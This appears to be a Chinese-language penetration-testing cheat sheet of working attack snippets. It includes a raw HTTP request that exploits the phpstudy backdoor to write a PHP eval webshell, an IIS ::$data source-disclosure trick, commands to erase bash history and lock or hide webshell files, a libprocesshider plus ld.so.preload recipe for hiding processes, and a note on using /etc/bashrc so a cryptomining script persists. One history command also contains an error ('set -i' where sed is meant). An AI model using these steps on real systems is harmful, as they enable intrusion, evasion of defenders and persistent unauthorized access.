老版本的iis环境 index.asp::$data 可爆源码
phpstudy后门直接写马
GET / HTTP/1.1
Host: 192.168.74.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36
Accept-Charset: print(\'check_t00ls\');file_put_contents("{$_SERVER[\'CONTEXT_DOCUMENT_ROOT\']}/" . \'./2.php\', \'<?php @eval($_POST[\\'t00ls\\']);?>\');
Accept-Encoding: gzip,deflate
[space]set +o history 针对你的工作关闭历史记录,并且由于空格的缘故,该命令本身也不会被记录
history | grep "keyword"
history -d [num] 删除指定历史命令 num代表id
set -i \'150,$d\' .bash_history 保留前150行命令
chattr +i evil.php 锁定文件
lsattr eval.php 查看属性
chattr -i evil.php 解除锁定
touch .test.txt 文件名前加.创建隐藏文件
Linux下隐藏进程
gianluca@sid:~/libprocesshider$ git clone https://github.com/gianlucaborello/libprocesshider.git &&make gianluca@sid:~/libprocesshider$ make gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl gianluca@sid:~/libprocesshider$ sudo mv libprocesshider.so /usr/local/lib/ root@sid:~# echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload 加载到动态链接器 现在在此程序目录下的任何文件都会隐藏掉
linux后渗透维权
etc/bashrc
/etc/bashrc: 为每一个运行bash shell的用户执行此文件,当bash shell被打开时,该文件被读取。所以重启后,挖矿脚本会继续下载。